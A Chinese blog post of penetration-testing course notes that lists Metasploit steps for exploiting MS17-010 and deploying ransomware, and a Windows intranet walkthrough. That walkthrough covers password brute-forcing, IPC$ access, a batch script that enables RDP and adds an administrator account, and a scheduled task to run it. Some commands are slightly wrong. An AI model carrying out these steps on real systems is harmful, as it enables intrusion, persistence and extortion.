目录

网络安全实训Day16

网络安全实训Day16

网络空间安全实训-渗透测试

  • 漏洞扫描

    • 定义

      • 扫描和探测目标范围内的主机存在哪些安全漏洞,或扫描目标范围内的那些主机存在某个指定的漏洞
    • 漏扫工具

      • AWVS
      • APPScan
      • MSF
    • 使用MSF扫描漏洞并利用

      • 1.搜索需要的攻击模块

        • search ms17-010
      • 2.使用攻击模块

        • use 模块名称
      • 3.设置扫描范围

        • set rhosts 192.168.12.0/24
      • 4.设置扫描线程

        • set thread 50
      • 5.开始扫描

        • run
      • 6.更换攻击模块为漏洞利用

      • 7.查看可用攻击载荷

        • show payloads
      • 8.设置攻击载荷

        • set payload 攻击载荷名称
      • 9.设置被攻击主机IP地址

        • set rhost IP地址
      • 10.设置反向连接的控制机IP地址

        • set lhost IP地址
      • 11.开始攻击

        • run
      • 12.上传病毒

        • upload 本地文件路径 远程主机路径
      • 13.执行勒索病毒

        • execute -f 勒索病毒路径
  • Windows内网渗透

    • 1.扫描对方操作系统和开放的端口

      • 确定对方是Windows系统开启了445接口
    • 2.针对该端口服务暴力破解Windows管理员账号密码

    • 3.与对方建立空连接

      • net use \对方ip地址\ipc$
      • 需要输入对方的管理员账号密码
    • 4.制作开启RDP和创建管理员账户的脚本bat

      • REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
      • net user 用户名 密码 /add
      • net local group administrator 用户名 /add
    • 5.访问对方C盘默认共享,将bat复制到对方C盘

      • 在文件资源管理器地址栏中输入 \对方IP地址\c$
    • 6.查看对方的系统时间

      • net time \对方IP地址
    • 7.给对方创建任务计划,定时执行BAT程序,开启RDP

      • at \对方ip地址 时间 执行的文件路径
    • 8.使用先前创建的管理员账号登陆RDP

https://i-blog.csdnimg.cn/blog_migrate/3a1899394da5783be7979b3c5afc44a9.png